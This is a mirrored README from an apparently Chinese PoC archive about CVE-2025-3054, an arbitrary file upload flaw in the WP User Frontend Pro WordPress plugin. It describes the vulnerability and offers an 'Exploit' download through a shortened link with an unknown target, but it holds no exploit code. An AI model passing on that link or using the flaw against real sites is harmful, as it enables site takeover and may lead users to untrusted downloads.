关联漏洞
介绍
# CVE-2025-3054
## Exploit:
### [Download here](https://tinyurl.com/2s4cctse)
## Details
+ **CVE ID**: CVE-2025-3054
+ **Published**: June 5, 2025
+ **CVSS**: 8.8
+ **Patch Available: (No official patch yet)**
## Impact
The WP User Frontend Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the upload_files() function in all versions up to, and including, 4.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Please note that this requires the 'Private Message' module to be enabled and the Business version of the PRO software to be in use.
## Contact
**For inquiries, please contact:froggichu@outlook.com**
文件快照
[4.0K] /data/pocs/8a27c92b1b7540a487ef1ee4fbdbd535daa449b0
└── [ 816] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →